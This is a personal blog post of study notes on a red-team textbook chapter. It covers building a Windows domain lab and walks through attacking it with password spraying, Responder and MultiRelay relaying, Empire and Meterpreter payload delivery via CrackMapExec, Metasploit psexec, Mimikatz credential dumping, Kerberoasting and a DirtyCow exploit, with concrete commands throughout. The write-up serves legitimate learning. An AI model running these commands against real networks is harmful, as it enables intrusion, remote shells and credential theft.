Posted in Blog, Resources, THP3

THP3 Ch 4 Review

Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.

Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it. 

THP3 04 – The Drive – Compromising The Network

The focus of this chapter will be corporate environments and living off the land. A definite red team focus. I’m looking forward to working through THP2 once I’m done with this to fill in some blanks. There won’t even be a vuln scan run in this chapter, which is great because it helps avoid detection.

I’ll say upfront that this was a very frustrating chapter. Not because of what Kim covered, but because of the nature of setting up a more complicated virtual environment. Setting up the network was doable, but doing a mini-setup means there’s not a lot going on in the network. So a lot of the tools will likely work better in an actual environment than in the lab. Since I was also working with the current versions of the various Windows systems, there were likely some exploits that have been dealt with. I’ve spent a lot of time working through the tools and have them “working”, but not necessarily getting what they should on the network. Luckily I’ve got some labs available in a certification that I’m working on that I’ll be able to do some additional practice on. The experience with the tools and troubleshooting is invaluable, but it is frustrating when things don’t work like they should. It did lead me to chasing some alternatives and learning a ton. So in the end, it’s all good. I’m okay continuing to bang away at this while continuing in the book. I’ll take notes, keep track of tools, and apply the info as I’m working on other labs.

Finding creds outside the network

First up is getting an initial entry point. It can be complicated and resource-intensive. Kim recommends KISS. And goes straight to password bruteforcing. This makes sense given all of the authentication required with various enterprise services. And finding things that are authenticated using the victim’s sign-on info can provide a foothold. This will involve password spraying. Going after external sources is helpful because the log-in attempts might not be logged, stuff on the peripheral might not require multi-factor authentication, people reuse passwords, and account lockout might not be enabled. In short, external sources often have a lower security level.

Kim notes that the fake mail server doesn’t exist anymore, so I feel like testing options are limited here. I’ll go back and research options for testing mail servers later.

Spray from SpiderLabs is a password spraying that supports multiple enterprise services (OWA, Lync, CISCO Web VPN, etc.). Passwords to use should be chosen based on the company. Kim reports commonly successful passwords as those including season and year, local sports team and digits, looking at older breaches and using similar passwords, and company name plus year, numbers, and/or special characters. It’s a good idea to run these scans slowly to avoid lockout. Seems like a good use of a server. Spray includes user and password files in several languages. Make to take a look at the password files and update as appropriate with the current year and potentially sports teams as mentioned above.

To configure Spray, you’ll need to capture a POST request for a password attempt (use Burp or ZAP) and save the data to a file. Check out the README for Spray to get the details of how each spray option would need to be configured. I went through targeting the practice website. Script worked fine – just slow going.

Ruler by Sensepost can also do bruteforcing and can do some persistence exploitation as well. It does some autodiscovery of Exchange configuration and looks for creds. It’s a pretty cool tool. I’m going to have to find a way to do some work with both of these on test environments.

Moving through the network

This will be exploitation that occurs after gaining access to the network. It’s time to do some network setup. Microsoft licensing means it’s hard to find Windows VMs, and you have to build the network yourself. This has been on my to-do list, so it’s nice to have to do it for book club. I suspect I’ll need to pull in some additional resources. All of the Windows options expire after a set time.

First up, the server. Kim addresses Windows Server 2016 in THP3 and Windows Server 2012 in THP2. Microsoft provides VMs to test Edge and IE. They expire after 90 days, but Microsoft recommends creating a snapshot when first installing the VM to roll back to. That’s what I’ve done previously. You can get demo ISOs for the servers from Microsoft. I recommend taking snapshots frequently as you go. While walking through the entire setup process when you’ve forked something is educational, it can get old. Also check your time settings when your VMs to avoid time sync issues.

A few helpful walkthroughs dealing with VM setup and Windows Server 2016 from Couchbase and a Microsoft TechNet Wiki that includes complete lab setup info. Once you’ve got the VM loaded, time to set up Active Directory. Then add users using Active Domain Administrative Center or PowerShell. I found the PowerShell option quicker – just note the changes won’t show up until you refresh the management center.

 New-ADUser -Name "<name>" -SamAccountName "<name>" -AccountPassword(Read-Host -AsSecureString "Input Password:") -Enabled $true
 New-ADGroup -Name "<groupname>" -SamAccountName "<groupname>" -GroupScope "<scope>"
 Add-ADGroupMember -Identity <groupname> -Members <member1>,<member2>,<member3>

AD setup was surprisingly straightforward and intuitive (I’m sure I’ll regret saying that as I do more network setup), so onto setting up the client machines. This was a bit more finicky – make sure you’ve got everything on the same network and the network is set to private – which is annoyingly obscure on Win8.1. You’ll need to set your boxes to use the server as the DNS. Or at least that’s what I had to do because just adding it to the hosts file didn’t cut it. Luckily I’ve got a few more VMs to set up that I’ll continue figuring out the correct sequence. Sidenote – I’m also remembering just how much I disliked Windows 7 and 8.1.

Joining the domain once you’ve got the network lined up is pretty easy – Control Panel > System and Security > System > Advanced System Settings > Computer Name. Then click “Change” and select the Domain option. You can put in either the FQDN or the NetBIOS name. If you are having trouble using the NetBIOS option, try the FQDN.

Dealing with GPO…open up Group Policy Management in the server. Kim has the GOP set to disable firewall, disable AV, disable updates, add the Helpdesk group to the local admins group, and link the GPO to the root domain. Going forward, I’ll setup the GPO before adding other boxes to the network.

Important Steps for Setup

  • Download your VM builds (clients) and an ISO for the server from Microsoft

  • Load VMs – take snapshots before starting for the first time

  • Setup domain controller on server – set up static IP for server and set it to be the DNS server

  • Setup active directory on server

    • It would be a good idea to give the server a name that’s easy to remember, just makes life easier.

  • Create users and groups

  • Setup group policy (see below for details)

  • Setup clients to to join domain

    • Put all on Host-Only network (Not required, but is my preferred option; could also do a NAT network)

    • Set up server to be DNS server (Network Connections – Change settings of this connection – Adjust IPv4 settings)

    • Make sure the network is set to private (start setting up sharing and it should ask if you want to make it private – Network status – View Network computers and devices). It’s not as straightforward as it is for WiFi, so you may have to dig around a bit.

    • Control Panel – System and Security – System – Advanced System Settings

      • Change name to something specific

      • Click on Domain radio button and put in domain name

  • Clone client machines as desired

Set up group policy on server

  • Open up Group Policy Management

  • Edit an existing GPO or create a new one

  • Disable AV – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Defender > Real-time Protection

  • Disable Firewall

    • Computer configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall

    • Computer configuration > Policies > Windows Settings > Security Settings > Windows Firewall > Protect all network connections > Disables (set for Domain Profile and Standard Profile)

  • Disable updates – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Update

  • Add Helpdesk to local admin group: Computer configuration > Preferences > Control Panel Settings > Local Users and Groups

    • New > Local Group > Administrators (Built-in)

    • Make sure action is Update

    • Add desired group

  • Only allow local login for Domain Admins, Local Administrators, and Helpdesk: Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Allow Logon Locally

  • Enable file and print sharing: Computer Configuration > Policies > Administrative Policies > Network > Network Connections > Windows Firewall > Allow inbound file and printer sharing

  • Disable SMB signing

    • SMB v1 disabled through a registry item in the GPO

    • SMB2 seems to need to be modified in the GPO to avoid breaking the policy

      • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options

  • Make sure the GPO is linked to the domain

Overall, not too bad for the first time through. I got some errors about automatic logon, but I’m okay leaving that off since it wouldn’t likely be on in an enterprise environment.

On to installation of Internet Information Services (IIS)…Kim provides a link to a walkthrough. Run this command on your server, then make sure it worked by going to the IP in a browser.

 Install-WindowsFeature -name Web-Server -IncludeManagementTools

It also says to configure SPN (Service Principle Names). I connected the IIS server to a host header.

 Setspn -A HTTP/<hostname> <iisServerName>
 Setspn -A HTTP/ csklabserver

I also set up a file share just to do it. I may go back and add a few things to the network, but this was a good start. Getting the GPO setup was the most fiddly part. I ran into some issues where my server decided to go on a field trip and I had to fix the time settings, but otherwise it went smoothly.

On The Network With No Creds

First up is doing some digging around the network without creds. This is working from getting on the network in whatever way and digging around. This could be from physically infiltrating the site or other methods.

Responder was the first tool. It worked well. Just a matter of waiting for something usable. You can either catch hashes and crack them or set up a popup to ask for creds. Not stealthy, but would get the job done. Once you play with this a little, it’s fairly easy to use. I did have to install some tools to get Responder running without complaint – hcxtools and hcxdumptool. That was on my 64-bit Kali VM and I couldn’t recreate the issue on the 32 bit. A little odd, but reinforces the importance of testing your tools and knowing your setup.

Get to the Responder directory (/usr/share/responder in regular Kali build), start Responder, get the info, then use Hashcat or similar to crack the NTLMv2 hashes. Hashcat has a ton of options, so take a look at the details. (Side note – you might also want to check out Crunch to generate custom wordlists if you can find out about the password policies in place or OSINT info on the accounts you capture hashes for.)

 ./ -I <interface> -<options>
 hashcat -a <attackmode> -m <hashtype> <filetocrack> <wordlistfile> -r <rulefiles>

The Multi Replay option was much more of a pain to get working. I played with this quite a bit before a friend said he thought it only worked on Windows 2012 and earlier servers. This made sense to me because when I ran RunFinger to check the network, the only target identified was my WIn7 box. So I had to download the ISO for 2012 and spin up a new VM for it. And add it as an additional domain controller. Good networking practice at least. Things got a little wonky, so I decided to start again using my Win2012 server as the initial DC. Got that setup as above, get the VMs back on the domain, and I was able to get MultiRelay working. Major lesson learned – know what all SMB is doing on your network before messing with it. There are quite a few things with SMB1 dependencies, so even though it’s recommended to disable it, that can cause major issues. But the issue for MultiRelay is SMB signing, so that is what needs to be disabled in the GPO. I spent way more time messing with this than I should have, but I wanted to understand what was going on and what made the network vulnerable. I was able to get a Win2016 DC added to my 2012 network and use MultiRelay to get a shell on there. When you start with newer versions of Windows, the things that let MultiRelay work aren’t there anymore. Trying to access my share with Windows 10, I basically got a security warning that said “nope”.

MultiRelay related commands:

 # Start Responder in another terminal from responder folder
 ./ -I eth0 -rv
 # User RunFinger if desired to id targets; run from responder/tools folder
 ./ -i <IPrange>
 # Run MultiRelay from responder/tools folder
 ./ -t <targetIP> -u ALL [-c <commands or payload>]

A few more references…

User Enumeration Without Creds

Nmap has a script to enumerate users. Once I got the syntax, this worked well. The main limitation is having a viable userlist. The default list pulled the administrator account. Combine this with some OSINT, and you should be able to enumerate the users. Only issue is watch the syntax.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='realmname' <DomainControllerIP>

If you have a wordlist (like the Metasploit namelist provided on Kali), you add ,userdb=<filename>.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='thp3lab',userdb=/usr/share/wordlists/metasploit/namelist.txt

Scanning the Network with CrackMapExec (CME)

This focused on using Empire’s REST feature, so I’ll be going back to play more with CME because there a lot of options. I’m using my Kali VM since I’m using VirtualBox. There’s a nice writeup here on the basics. Note – I had to use crackmapexec to call the program rather than cme as in the book, depends on how you install. I got a KeyError: 'launcher' error. Did some digging and found a fix. Looking at the comments, it seems Empire changes regularly, so any tools used with it should be checked before they are needed. The fix did work – you have to make a couple edits to the /usr/lib/python2.7/dist-packages/cme/modules/ file (see the link for details). I got it to run with Empire, but it didn’t seem to connect. I think I may need to spend a week just messing around with Empire – it seems to be rather finicky.

Setting up the listener in Empire was a little fussy. Between the book, the Getting Shells 101 CME documentation, and general troubleshooting, I got my listener going. Make sure you’ve setup the cert in Empire. I ended up resetting Empire and generating a new cert.

 cd /opt/Empire

Then start Empire and setup the listener. Make the password whatever is in your config file for CME.

 ./empire --rest --password 'password'
 (Empire) > listeners
 (Empire: listeners) > uselistener http
 (Empire: listeners/http) > set Name cmeTest
 (Empire: listeners/http) > set Host <YourIP>:<Port>
 (Empire: listeners/http) > set Port <Port>
 (Empire: listeners/http) > set CertPath <CertPath> # default is data
 (Empire: listeners/http) > execute

CME also has a Meterpreter module. I gave that a shot since I’m pretty comfortable with Metasploit. Basically set up a handler, then run the CME using the metinject module. I wasn’t able to get a shell with this either, so I’m going to have to play with this some more. Both say the payloads have been executed, but no connection is made in either.

 crackmapexec IPrange -u username -p password -M <module> -o <options>
 crackmapexec -u user1 -p password -M empire_exec -o LISTENER=test #listener name
 crackmapexect -u user1 -p password -M metinject -o LHOST= LPORT=8443

You can also use Metasploit to see where the creds are valid using the smb_login module. CME is much faster though.

 msf > use auxiliary/scanner/smb/smb_login
 msf auxiliary(smb_login) > set RHOSTS <IP range>
 msf auxiliary(smb_login) > set SMBDomain <domain>
 msf auxiliary(smb_login) > set SMBUser <user>
 msf auxiliary(smb_login) > set SMBPass <password>
 msf auxiliary(smb_login) > services -p 445 -R
 msf auxiliary(smb_login) > run


I went chasing squirrels to better compromise the network. I didn’t get the foothold I wanted with the book’s tools, so I went looking for options. A friend had mentioned Impacket as an alternative to MultiRelay. Raj Chandel has a nice beginner’s guide, but like many of the guides the focus is listing what the tool does rather than putting it into practice. Metasploit Minute has a YouTube video that walks through some of the examples. I’ll keep working with this and the other network attacks. I like Impacket a lot and will keep exploring its capabilities. Once you get the hang of the syntax, it’s really easy to work with.

Found this nice write-up on using creds to own Windows boxes. I used the winexe option to get a shell and then used Empire to generate a one liner. I was able to get an agent established and send commands using modules on my Win7 box. I didn’t get the expected results though. Another step in the right direction at least. I suspect that the way I have my network setup doesn’t have the necessary SMB vulns to make this work.

 winexe -U domain/user%password //IP cmd.exe
 # In Empire
 usestager multi/launcher
 set Listener http

I suspect a lot of the issues I’m running into have to do with working with a small network with limited modification. It also seems like with SMBv3.0, things get a lot less effective. I got multiple errors putting the launcher code into the systems I had shell on.

Since I did have creds, using the psexec module in Metasploit worked well. I did have to specify the domain though.

 msf > use exploit/windows/smb/psexec
 msf exploit(window/smb/psexec) > set RHOST <targetIP>
 msf exploit(window/smb/psexec) > set SMBPass <password>
 msf exploit(window/smb/psexec) > set SMBUser <username>
 msf exploit(window/smb/psexec) > set SMBDomain <domain>
 msf exploit(window/smb/psexec) > run

This let me easily upload the Empire payloads, but I got errors with several of the options.

A list of related references in no particular order for future reference…

After Compromising Your Initial Host

Lots of info here about what to do once you have a shell. There’s also info about a Github repo script with a lot of the commands from The Red Team Field Manual that can be used to search for commands from the book. I also found another Github with RTFM inspired cheat sheets. I just got copies of this and The Blue Team Field Manual, and it’s nice to have an idea of how to make the material more portable and easier to search. Pretty cool.

Privilege Escalation

Getting from a regular user to a privileged user is always a goal.

Methods Kim listed

  • Unquoted service paths

  • Finding insecure registry permissions for services

  • Check if the AlwaysInstallElevated registry key is enabled

I didn’t go digging too much with these on my network because there was a Privilege Escalation lab using Metasploitable3. So onto that…

Privilege Escalation Lab

Getting Metasploitable3 up and running can be a little more finicky than other VMs. It’s not difficult, just a little different. I think the intro blog from Rapid7 has the simplest install instructions. I did have to adjust the network adapter used, but nothing significant. There are a lot of options in Metasploitable3 and lots of resources online to go through.

Running an nmap scan showed lots of open ports. Kim chooses to target ManageEngine. Searching ManageEngine in Metasploit shows several potential exploits to use. Kim chooses the connection_id option to explore. This works, but isn’t privileged, so onto checking out processes with ps. Kim points out Tomcat and that you can google to find where user info is stored. Then using dir to search for the file and type (basically the Windows equivalent to cat) to display it. Use the creds found to login to the Tomcat management console to make sure they work…ok, how to do that? The easiest option is going to a browser. There are CLI options, but it didn’t seem to be setup on the box. The browser was easier. Creds worked, so back to Metasploit to repeat the process with Tomcat. And get a connection error because Metasploitable3 decided to take a break. Get it back up and running, and the exploit worked as expected.

It was great to work with Metasploitable3 a bit. There’s definitely a lot to work with, so it stays on the list of things to work on. This chapter has been great to get a more extensive home lab built up. Having that experience will help me build a solid testing network on an old server I have.

Pulling Clear Text Credentials from Memory

Mimikatz has been an effective tools for getting passwords, but it doesn’t work with Windows 10. To get the passwords back in LSASS, you can adjust the registry key. It just requires the user re-login. Locking the workstation is the easiest way to accomplish this triggering a lockscreen (rundll32.exe user32.dll,LockWorkStation). Then run Mimikatz again to get the passwords.

Mimikittenz is a tool to get passwords from target processes, like browsers. You can also write search expressions within Mimikittenz. And it doesn’t require local admin access. But you have to get the script onto the box.

I used the psexec module in Metasploit to get to where I could use Mimikatz. I did some work in both Win7 and Win10. I had to migrate meterpreter to a 64bit process in Win10. I could load and run Mimikatz. It did warn me I was using Mimikatz on a newer OS and recommended Kiwi instead. Running Mimikatz didn’t get usable info (which was expected). I gave Kiwi a shot as recommended, and was able to get hashes.

I have been able to use Mimikatz in other labs, and it works well when the conditions are right. Kind of like most tools.

Getting Passwords from the Windows Credential Store and Browsers

The Windows Credential Store is where usernames, etc. are saved when MS IE or Edge save your info. Info is accessible by the user. There are scripts available to get the info – Get-WebCredentials and Gathering Windows Credentials. Empire also has an option to get creds from Chrom (payload powershell/collection/ChromeDump). There are also tools available to extract cookies and get info from file sharing utilities.

Getting Local Creds and Information from OSX

For understandable reasons, most resources, including THP3, focus on Windows. That’s what is found in most enterprise environments. But Macs exist and may be fairly prevalent depending on the environment. There are similar attacks to get info from Macs. Kim talks about using Empire to target Macs, specifically setting up an Office macro payload – launch Empire, get a listener going, then usestager osx/macro, set OutFile /tmp/, and generate the payload. It’s Base64 code executed by Python, which is installed by default on Macs. Pop open Excel, create a macro, and swap out your payload for the macro code. Then save as an xlsm. I don’t have a Mac to test on, so just an interesting read for now. I’ve not had luck finding options for testing on Mac OS unfortunately, so until I can find a way, at least I’ve got some ideas.

Living Off of the Land in a Windows Domain Environment

This section focuses on using PowerShell Empire, but the takeaway is that if you can upload PowerShell scripts, you can do a lot of damage.

General notes as I continue to play with things…

Service Principal Names

Service Principal Names can provide info on databases and web servers. The setspn.exe file can be used – it’s on Windows by default, so handy to avoid having to deliver payloads. Basic format is

 setspn -T <domain> -F -Q */*

T specifies the domain, F sets queries to be at the forest rather than domain level, Q specifies each target domain or forest, and */* queries everything. There are a lot of other options, so it might be helpful to check out the Microsoft wiki on setspn.

Querying Active Directory

This section focused on Empire and using PowerView. Since Empire is still giving me fits (meaning getting Empire payloads to work and get active agents), in the interest of time, I decided to use some of the other tools to do similar works. Instead of using Powerview to get info about Active Domain users, I used an Impacket example. The GetADUsers example will get info about the AD users including password last set and last logon dates. PowerView has queries to get user, group member, and computer info. It is another one of those things I’ll keep working with as I’m troubleshooting Empire. There are also Metasploit modules available to do similar tasks (in the post/windowsgather group).


This is a cool way of graphically looking at things. I used it for SANS 2018 Holiday Hack (KringleCon) – one of the exercises involved analyzing a Bloodhound file. It’s definitely handy. From a defense perspective, this would be very helpful to identify potential exploitation paths. It can be run through Empire and with a faster C# option (Sharphound). The ingestor has to be on the host system and multiple files are generated that then need to be pulled over for analysis. The wiki is a great resource and is what I used for KringleCon. Kim provided files to work with. Unfortunately they are in CSV format, and Bloodhound 2.0 only takes JSON. I may go back later and convert the CSV to JSON, but for now I’ll move on since I worked with Bloodhound for KringleCon. The built-in queries are useful, so the tool is easy to get functioning once you have the files.

Some additional Bloodhound resources from Kim:

Moving Laterally – Migrating Processes

When you have a box with multiple users, it’s common to make/migrate tokens of different users. Metasploit can do this with the incognito module. Empire uses steal_tokens. According to Kim, this can break shells, so it’s a good idea to inject a new agent into a process owned by a different user. Empire’s PSInject can be used for this.

Moving Laterally Off Your Initial Host

The simplest option to pivot is using the permissions of the current user to get another box. There are options for this in Empire (the find_localadmin_access module) and Metasploit (local_admin_search_enum). Empire also has a lot of other options, so it’s a matter of spending time with it. There is also an option using Windows Management Instrumentation (WMI) in Empire.

Lateral Movement with DCOM

Distributed Component Object Model (DCOM) is another option for moving laterally. DCOM applications can be checked in PowerShell using Get-CimInstance Win32_DCOMApplication.

Some resources for learning more…


Hashes are fairly easy to get – Mimikatz and Responder have both been used to grab hashes in this chapter. The hashes can be passed using either Empire (powershell/credentials/powerdump) or Metasploit (exploit/windows/smb/psexec). This is an older method, but may still be encountered.

Gaining Creds from Service Accounts

This sections talks about Kerberoasting. Powershell is used to pull ticket info into memory. PowerSploit could also be used. Then Mimikatz can be used to export the tickets. Then the tickets have to be downloaded for cracking. The hashes can be cracked with tgsrepcrack, John the Ripper, or Hashcat. There is also a module in Empire to do this.

Dumping the Domain Controller Hashes

Multiple options here. You can run commands on the domain controller and use Shadow Volume/Raw. NinjaCopy and DCSync can also be used.

Lateral Movement via RDP over the VPS

Back to that VPS setup earlier…basically infect host, SSH from attacker to the VPS, set up local port forward, set up port forward in Meterpreter, and open RDP on the attack box. It’s more involved than that, but that’s the basic approach.

Pivoting in Linux

dnscat2 and Meterpreter have their own forwarding. An SSH shell could be used with local file inclusion or remote code execution. There’s a mimipenguin tool similar to Mimikat to pull creds.

Privilege Escalation in Linux

Same basic approach as Windows. LinEnum is a big help to look for possible routes of exploitation. It does return a lot of info in my experience, but I’ve found it helpful in CTFs I’ve done. Kim also mentions Linux Exploit Suggester, which I’ve come across before. Raj Chandel has a great blog post on Linux privilege escalation that provides some additional options. Kim talks about DirtyCOW, which involves a race condition. The only problem is it can cause kernel panics, so you need to match the version to the kernel.

Linux Lateral Movement Lab

I had to switch these VMs over to VirtualBox. That turned into a bit of an adventure, so it turned into a separate blog post on converting VMs and dealing with IPs in a virtual lab. Just another hurdle to getting through this chapter. Good practice, but not exactly on-task. You do need sudo access to edit the interfaces file, so luckily Kim provided login info. There are likely other ways of doing it, but I didn’t want to spend any more time digging than I already had.

Scan the network, see what’s open. Check out the box that has a webserver setup. Several services running. Kim says a web fuzzer showed openCMS running Struts2, which has been involved in breaches before. Check Metasploit for an associated module, and give it a shot (struts2_content_type_ognl). Just running it with the default options, I didn’t get anywhere. When I kept reading and followed Kim’s steps, I still didn’t get anywhere. Or so I thought – this exploit will not show in Metasploit. It reports that the exploit was completed, but no session was created. Reading on to get the tidbit about going back to dnscat, I got everything working. I should remember to skim over the sections before I start when it’s been awhile since I read it. The dnscat shell is a bit slow, so there’s some patience required. Everything worked as it should, so on to DirtyCow. Had to switch over to a NAT Network for this so I could fetch DirtyCow. I ran into issues with wget being unable to resolve the host address. It seems that sometimes Ubuntu 16.04 and up has issues with DNS in VirtualBox. I decided that rather than track down a fix, I would just use my VPS since I can use its IP easily. Using that, I was able to get the DirtyCow exploit to work and add the suggestions Kim has to make the exploit more stable.

Following Kim’s direction, I was able to get over to the Jenkins box with out issue. Pulling up the Jenkins site using port forwarding was incredibly slow. Like so painfully slow you think it died slow. But I was able to see what I was supposed to see. I was able to get all the way through following Kim’s walkthrough. I followed his instructions the first time through to get through quickly since DirtyCow can be unstable. I’ll take more time to look around as I come back to the lab. The ending point from the book’s perspective was getting an .ibd file. I believe the database can be recovered from the .frm and .ibd files available as the db_backup user, but that will require some research

Wrap Up

Completing this chapter was a marathon effort. I think I’ve been working on it off and on for a month. It was a combination of maddening and frustrating. It was great because I learned a lot. But it was frustrating trying to track down why things weren’t working. Working with Active Domain and setting up a network was good experience. Taking that over to a server where I can build out a more complete network will be great. I had one or two servers plus several workstations going at once, but running all that with Kali did kill all my RAM and result in paused VMs. Not surprising.

Next Steps

  • Dedicate some time to Empire

  • Build network on server

  • Keep working on everything

  • Rejoice that chapters 5 and 6 are relatively low-key


Lifelong paradox - cyber sec enthusiast - loves to learn

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.